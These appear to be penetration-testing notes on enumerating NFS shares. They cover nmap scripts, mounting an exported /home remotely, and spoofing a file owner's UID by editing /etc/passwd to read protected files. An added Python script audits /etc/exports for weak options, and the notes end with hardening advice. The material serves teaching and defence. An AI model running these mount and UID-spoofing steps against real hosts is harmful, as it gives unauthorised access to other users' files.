NFS Enumeration

NFS is very insecure. Check port 111 for the rpcbind and portmapper services.

  • nmap -p 111 --script "nfs*" <ip> (runs all NFS scripts)

  • In the output, if showmount results are visible, check the listed directory, as it is vulnerable. For example, if the /home directory is being shared, we can access it by mounting it on our Kali virtual machine.

  • mkdir ~/vulnhome

  • sudo mount -o nolock <ip>:/home ~/vulnhome/ (mounts the remote /home on the local vulnhome directory; -o nolock disables file locking)

  • Check the mounted directory

  • If the vulnerable file is not accessible, check the UID of its owner, create a new user, and change that user's UID to match

  • sudo adduser <username>

  • sudo sed -i -e 's/<new user UID>/<vuln UID>/g' /etc/passwd

  • su <new user>
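
Seen from the server side, the steps above work because of how /home is exported. The following is an added example, not part of the original notes, that audits exports-file text for the options that allow the mount and the UID matching; the sample file, the function name audit_exports and the finding labels are constructed for illustration.

```python
import re

# Constructed sample /etc/exports content for illustration (not from a real host).
SAMPLE_EXPORTS = """\
# weak: /home open to every host, client-supplied UIDs trusted
/home       *(rw,sync,no_root_squash)
# tighter: one subnet, Kerberos, every caller mapped to an unprivileged ID
/srv/share  192.0.2.0/24(rw,sync,sec=krb5p,all_squash,anonuid=65534,anongid=65534)
/srv/pub    (ro,insecure)
"""

# One client entry: optional host pattern followed by optional "(opt,opt,...)".
CLIENT_RE = re.compile(r"^([^()]*)(?:\(([^()]*)\))?$")


def audit_exports(text):
    """Return (path, client, finding) tuples for risky entries in exports text."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        path, *specs = line.split()
        for spec in specs or [""]:               # a bare path is treated as any host
            m = CLIENT_RE.match(spec)
            if m is None:
                continue
            client = m.group(1) or "*"           # empty host pattern means any host
            opts = set(filter(None, (m.group(2) or "").split(",")))
            flavors = {"sys"}                    # AUTH_SYS is the default flavor
            for opt in opts:
                if opt.startswith("sec="):
                    flavors = set(opt[4:].split(":"))
            if client == "*":
                findings.append((path, client, "any-host"))
            if "no_root_squash" in opts:
                findings.append((path, client, "no_root_squash"))
            if "insecure" in opts:
                findings.append((path, client, "insecure-port"))
            # With AUTH_SYS the server believes whatever UID the client sends,
            # which is why a local user with a matching UID can read the files.
            if "sys" in flavors and "all_squash" not in opts:
                findings.append((path, client, "client-uid-trusted"))
    return findings


if __name__ == "__main__":
    for path, client, finding in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} -> {client}: {finding}")
```

Restricting the client list, keeping root_squash, and using all_squash or a Kerberos sec= flavor clears the findings, as the /srv/share line shows.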
